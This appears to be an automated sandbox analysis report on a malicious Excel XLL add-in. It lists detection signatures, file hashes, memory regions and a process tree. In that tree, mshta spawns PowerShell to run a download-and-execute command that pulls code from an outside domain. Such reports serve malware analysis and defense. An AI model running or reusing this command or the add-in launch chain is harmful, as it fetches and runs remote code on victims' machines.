Analysis

  • max time kernel
    143s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-05-2024 02:18

General

  • Target

    98d5b16f16749f0050b5ff64c3b611f460abe079e9c895861e98770894da0442.xll

  • Size

    12KB

  • MD5

    9ec6f0c4cecd543da8b08e13da2eadc5

  • SHA1

    0e598c70ae358ada7970de5bb2d30422264f494a

  • SHA256

    98d5b16f16749f0050b5ff64c3b611f460abe079e9c895861e98770894da0442

  • SHA512

    d5561578af4901be129fbb95a4e180acfd3c4bebc09a939a507c0c5f3767bfa21190a08ba6d1bd3a59d4d181a6db424dd96d04e9de8fa95bf78b5fe6e301d8e7

  • SSDEEP

    192:qL29RBzDzeobchBj8JONNONrrucrEPEjr7Aha:U29jnbcvYJOKNucvr7Ca

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\98d5b16f16749f0050b5ff64c3b611f460abe079e9c895861e98770894da0442.xll"
    1⤵
    • Loads dropped DLL
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4140
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta
      2⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:936
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4528
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3808 --field-trial-handle=2264,i,15001568551143786084,90255922961447677,262144 --variations-seed-version /prefetch:8
    1⤵
      PID:1628

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\BHC2O5WS\d[1].htm
      Filesize

      2KB

      MD5

      f754844cfb65838d1dd6b19dde5d835c

      SHA1

      b3eb677783adc88c8d048898449e04d49f416db6

      SHA256

      3644b387519f3509a1ce3d2201e2e1e8af36217138cc6f9e62d6e37c887097a6

      SHA512

      f42f89562b5c0be86dbd04683ee6c30711155acd1239e273da726c2bfedf5d0806c479b7107792c136bff6e97efb8d9145df0c176f499f86f1b7e304a2e3ccdf

    • C:\Users\Admin\AppData\Local\Temp\98d5b16f16749f0050b5ff64c3b611f460abe079e9c895861e98770894da0442.xll
      Filesize

      12KB

      MD5

      9ec6f0c4cecd543da8b08e13da2eadc5

      SHA1

      0e598c70ae358ada7970de5bb2d30422264f494a

      SHA256

      98d5b16f16749f0050b5ff64c3b611f460abe079e9c895861e98770894da0442

      SHA512

      d5561578af4901be129fbb95a4e180acfd3c4bebc09a939a507c0c5f3767bfa21190a08ba6d1bd3a59d4d181a6db424dd96d04e9de8fa95bf78b5fe6e301d8e7

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1u0mrbcf.oii.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/4140-1-0x00007FFD9732D000-0x00007FFD9732E000-memory.dmp
      Filesize

      4KB

    • memory/4140-0-0x00007FFD57310000-0x00007FFD57320000-memory.dmp
      Filesize

      64KB

    • memory/4140-6-0x00007FFD97290000-0x00007FFD97485000-memory.dmp
      Filesize

      2.0MB

    • memory/4140-2-0x00007FFD57310000-0x00007FFD57320000-memory.dmp
      Filesize

      64KB

    • memory/4140-8-0x00007FFD97290000-0x00007FFD97485000-memory.dmp
      Filesize

      2.0MB

    • memory/4140-7-0x00007FFD57310000-0x00007FFD57320000-memory.dmp
      Filesize

      64KB

    • memory/4140-11-0x00007FFD97290000-0x00007FFD97485000-memory.dmp
      Filesize

      2.0MB

    • memory/4140-10-0x00007FFD97290000-0x00007FFD97485000-memory.dmp
      Filesize

      2.0MB

    • memory/4140-88-0x00007FFD97290000-0x00007FFD97485000-memory.dmp
      Filesize

      2.0MB

    • memory/4140-12-0x00007FFD97290000-0x00007FFD97485000-memory.dmp
      Filesize

      2.0MB

    • memory/4140-13-0x00007FFD54A60000-0x00007FFD54A70000-memory.dmp
      Filesize

      64KB

    • memory/4140-14-0x00007FFD97290000-0x00007FFD97485000-memory.dmp
      Filesize

      2.0MB

    • memory/4140-46-0x00007FFD9732D000-0x00007FFD9732E000-memory.dmp
      Filesize

      4KB

    • memory/4140-17-0x00007FFD97290000-0x00007FFD97485000-memory.dmp
      Filesize

      2.0MB

    • memory/4140-16-0x00007FFD97290000-0x00007FFD97485000-memory.dmp
      Filesize

      2.0MB

    • memory/4140-18-0x00007FFD54A60000-0x00007FFD54A70000-memory.dmp
      Filesize

      64KB

    • memory/4140-3-0x00007FFD57310000-0x00007FFD57320000-memory.dmp
      Filesize

      64KB

    • memory/4140-85-0x00007FFD57310000-0x00007FFD57320000-memory.dmp
      Filesize

      64KB

    • memory/4140-9-0x00007FFD97290000-0x00007FFD97485000-memory.dmp
      Filesize

      2.0MB

    • memory/4140-5-0x00007FFD57310000-0x00007FFD57320000-memory.dmp
      Filesize

      64KB

    • memory/4140-15-0x00007FFD97290000-0x00007FFD97485000-memory.dmp
      Filesize

      2.0MB

    • memory/4140-48-0x00007FFD97290000-0x00007FFD97485000-memory.dmp
      Filesize

      2.0MB

    • memory/4140-86-0x00007FFD57310000-0x00007FFD57320000-memory.dmp
      Filesize

      64KB

    • memory/4140-87-0x00007FFD57310000-0x00007FFD57320000-memory.dmp
      Filesize

      64KB

    • memory/4140-84-0x00007FFD57310000-0x00007FFD57320000-memory.dmp
      Filesize

      64KB

    • memory/4140-47-0x00007FFD97290000-0x00007FFD97485000-memory.dmp
      Filesize

      2.0MB

    • memory/4140-45-0x00007FFD97290000-0x00007FFD97485000-memory.dmp
      Filesize

      2.0MB

    • memory/4140-4-0x00007FFD97290000-0x00007FFD97485000-memory.dmp
      Filesize

      2.0MB

    • memory/4528-63-0x0000000005940000-0x0000000005C94000-memory.dmp
      Filesize

      3.3MB

    • memory/4528-64-0x0000000005E30000-0x0000000005E4E000-memory.dmp
      Filesize

      120KB

    • memory/4528-65-0x0000000005E70000-0x0000000005EBC000-memory.dmp
      Filesize

      304KB

    • memory/4528-66-0x0000000007670000-0x0000000007CEA000-memory.dmp
      Filesize

      6.5MB

    • memory/4528-53-0x00000000057D0000-0x0000000005836000-memory.dmp
      Filesize

      408KB

    • memory/4528-51-0x0000000004E70000-0x0000000004E92000-memory.dmp
      Filesize

      136KB

    • memory/4528-50-0x00000000050C0000-0x00000000056E8000-memory.dmp
      Filesize

      6.2MB

    • memory/4528-49-0x0000000002860000-0x0000000002896000-memory.dmp
      Filesize

      216KB

    • memory/4528-52-0x0000000005760000-0x00000000057C6000-memory.dmp
      Filesize

      408KB

    • memory/4528-67-0x0000000006350000-0x000000000636A000-memory.dmp
      Filesize

      104KB